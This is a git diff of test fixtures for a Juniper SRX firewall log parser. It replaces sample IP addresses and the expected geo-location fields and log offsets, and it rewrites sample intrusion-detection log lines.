@@ -1370,7 +1275,7 @@ "event.end": "2013-01-19T15:18:23.040-02:00", "event.kind": "event", "event.module": "juniper", - "event.original": "reason=\"TCP CLIENT RST\" source-address=\"4.0.0.1\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"4.0.0.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", + "event.original": "reason=\"TCP CLIENT RST\" source-address=\"67.43.156.12\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.12\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", "event.outcome": "success", "event.severity": 14, "event.start": "2013-01-19T15:18:20.040-02:00", 
@@ -1391,7 +1296,7 @@ "juniper.srx.session_id_32": "32", "juniper.srx.tag": "APPTRACK_SESSION_CLOSE", "log.level": "informational", - "log.offset": 12689, + "log.offset": 12789, "network.bytes": 1038, "network.iana_number": "6", "network.packets": 8, @@ -1403,8 +1308,8 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1" + "5.0.0.1", + "67.43.156.12" ], "related.user": [ "user1" @@ -1416,16 +1321,15 @@ "server.packets": 3, "server.port": 80, "service.type": "juniper", - "source.as.number": 3356, - "source.as.organization.name": "Level 3 Parent, LLC", + "source.as.number": 35908, "source.bytes": 392, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "4.0.0.1", - "source.nat.ip": "4.0.0.1", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", + "source.nat.ip": "67.43.156.12", "source.nat.port": 48873, "source.packets": 5, "source.port": 48873, @@ -1437,14 +1341,9 @@ }, { "@timestamp": "2020-11-04T14:23:09.264-02:00", - "client.ip": "50.0.0.100", + "client.ip": "175.16.199.1", "client.nat.port": 24065, "client.port": 24065, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "30.0.0.100", "destination.nat.ip": "30.0.0.100", "destination.nat.port": 768, 
@@ -1456,7 +1355,7 @@ "event.dataset": "juniper.srx", "event.kind": "event", "event.module": "juniper", - "event.original": "source-address=\"50.0.0.100\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"50.0.0.100\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"", + "event.original": "source-address=\"175.16.199.1\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"", "event.outcome": "success", "event.severity": 14, "event.timezone": "-02:00", @@ -1472,7 +1371,7 @@ "juniper.srx.session_id_32": "100000165", "juniper.srx.tag": "RT_FLOW_SESSION_CREATE_LS", "log.level": "informational", - "log.offset": 13489, + "log.offset": 13603, "network.iana_number": "1", "observer.egress.zone": "trust", "observer.ingress.interface.name": "reth2.0", 
@@ -1482,21 +1381,24 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "30.0.0.100", - "50.0.0.100" + "175.16.199.1", + "30.0.0.100" ], "rule.name": "alg-policy", "server.ip": "30.0.0.100", "server.nat.port": 768, "server.port": 768, "service.type": "juniper", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "50.0.0.100", - "source.nat.ip": "50.0.0.100", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", + "source.nat.ip": "175.16.199.1", "source.nat.port": 24065, "source.port": 24065, "tags": [ @@ -1536,7 +1438,7 @@ "juniper.srx.session_id_32": "7087", "juniper.srx.tag": "RT_FLOW_SESSION_DENY_LS", "log.level": "informational", - "log.offset": 14137, + "log.offset": 14259, "network.iana_number": "17", "observer.egress.zone": "junos-host", "observer.ingress.interface.name": ".local..0", @@ -1563,18 +1465,11 @@ { "@timestamp": "2020-01-19T15:18:20.040-02:00", "client.bytes": 392, - "client.ip": "4.0.0.1", + "client.ip": "67.43.156.12", "client.nat.port": 48873, "client.packets": 5, "client.port": 48873, - "destination.as.number": 29256, - "destination.as.organization.name": "Syrian Telecom", "destination.bytes": 646, - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "SY", - "destination.geo.country_name": "Syria", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 38.0, "destination.ip": "5.0.0.1", "destination.nat.ip": "5.0.0.1", "destination.nat.port": 80, 
@@ -1589,7 +1484,7 @@ "event.end": "2020-01-19T15:18:23.040-02:00", "event.kind": "event", "event.module": "juniper", - "event.original": "reason=\"TCP CLIENT RST\" source-address=\"4.0.0.1\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"4.0.0.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", + "event.original": "reason=\"TCP CLIENT RST\" source-address=\"67.43.156.12\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.12\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", "event.outcome": "success", "event.severity": 14, "event.start": "2020-01-19T15:18:20.040-02:00", 
@@ -1610,7 +1505,7 @@ "juniper.srx.session_id_32": "32", "juniper.srx.tag": "APPTRACK_SESSION_CLOSE_LS", "log.level": "informational", - "log.offset": 14803, + "log.offset": 14929, "network.bytes": 1038, "network.iana_number": "6", "network.packets": 8, @@ -1622,8 +1517,8 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1" + "5.0.0.1", + "67.43.156.12" ], "related.user": [ "user1" @@ -1635,16 +1530,15 @@ "server.packets": 3, "server.port": 80, "service.type": "juniper", - "source.as.number": 3356, - "source.as.organization.name": "Level 3 Parent, LLC", + "source.as.number": 35908, "source.bytes": 392, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "4.0.0.1", - "source.nat.ip": "4.0.0.1", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", + "source.nat.ip": "67.43.156.12", "source.nat.port": 48873, "source.packets": 5, "source.port": 48873, @@ -1661,17 +1555,7 @@ "client.nat.port": 6018, "client.packets": 42, "client.port": 58943, - "destination.as.number": 42652, - "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh", "destination.bytes": 2132, - "destination.geo.city_name": "Philippsburg", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 49.2317, - "destination.geo.location.lon": 8.4607, - "destination.geo.region_iso_code": "DE-BW", - "destination.geo.region_name": "Baden-W\u00fcrttemberg", "destination.ip": "46.165.154.241", "destination.nat.ip": "46.165.154.241", "destination.nat.port": 80, 
@@ -1705,7 +1589,7 @@ "juniper.srx.src_nat_rule_name": "our-nat-rule", "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE", "log.level": "informational", - "log.offset": 15606, + "log.offset": 15746, "network.bytes": 4454, "network.iana_number": "6", "network.packets": 76, @@ -1746,17 +1630,7 @@ "client.nat.port": 24519, "client.packets": 161, "client.port": 64720, - "destination.as.number": 50881, - "destination.as.organization.name": "ESET, spol. s r.o.", "destination.bytes": 9670, - "destination.geo.city_name": "Bratislava", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "SK", - "destination.geo.country_name": "Slovakia", - "destination.geo.location.lat": 48.15, - "destination.geo.location.lon": 17.1078, - "destination.geo.region_iso_code": "SK-BL", - "destination.geo.region_name": "Bratislava", "destination.ip": "91.228.167.172", "destination.nat.ip": "91.228.167.172", "destination.nat.port": 8883, @@ -1800,7 +1674,7 @@ "juniper.srx.src_nat_rule_type": "source rule", "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE", "log.level": "informational", - "log.offset": 16469, + "log.offset": 16613, "network.bytes": 19200, "network.iana_number": "6", "network.packets": 257, 
@@ -1839,15 +1713,16 @@ "client.ip": "10.1.1.100", "client.nat.port": 30838, "client.port": 49583, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.port": 53, "event.action": "flow_started", 
@@ -1857,7 +1732,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"8.8.8.8\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
+ "event.original": "source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"175.16.199.1\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
 "event.outcome": "success",
 "event.risk_score": 1.0,
 "event.severity": 14,
@@ -1878,7 +1753,7 @@
 "juniper.srx.src_nat_rule_type": "source rule",
 "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
 "log.level": "informational",
- "log.offset": 17715,
+ "log.offset": 17863,
 "network.iana_number": "17",
 "observer.egress.zone": "untrust",
 "observer.ingress.interface.name": "ge-0/0/1.0",
@@ -1890,10 +1765,10 @@
 "related.ip": [
 "10.1.1.100",
 "172.19.34.100",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "rule.name": "default-permit",
- "server.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.port": 53,
 "service.type": "juniper",
@@ -1913,16 +1788,17 @@
 "client.nat.port": 26764,
 "client.packets": 1,
 "client.port": 63381,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 82,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -1935,7 +1811,7 @@
 "event.end": "2020-07-13T14:12:08.530-02:00",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"8.8.8.8\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
+ "event.original": "reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\"
destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.start": "2020-07-13T14:12:05.530-02:00",
@@ -1958,7 +1834,7 @@
 "juniper.srx.uplink_rx_bytes": "0",
 "juniper.srx.uplink_tx_bytes": "0",
 "log.level": "informational",
- "log.offset": 18627,
+ "log.offset": 18789,
 "network.bytes": 148,
 "network.iana_number": "17",
 "network.packets": 2,
@@ -1972,11 +1848,11 @@
 "related.ip": [
 "10.1.1.100",
 "172.19.34.100",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "rule.name": "default-permit",
 "server.bytes": 82,
- "server.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log b/x-pack/filebeat/module/juniper/srx/test/idp.log
index c05d9732fb5d..25fa36d89318 100644
--- a/x-pack/filebeat/module/juniper/srx/test/idp.log
+++ b/x-pack/filebeat/module/juniper/srx/test/idp.log
@@ -1,7 +1,7 @@
-<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
-<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
-<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354"
message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
-<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
-<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203"
destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"]
-<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
-<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
+<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP"
rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
+<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
+<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP"
threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
+<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
+<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.81.2.69.144.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"]
+<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT
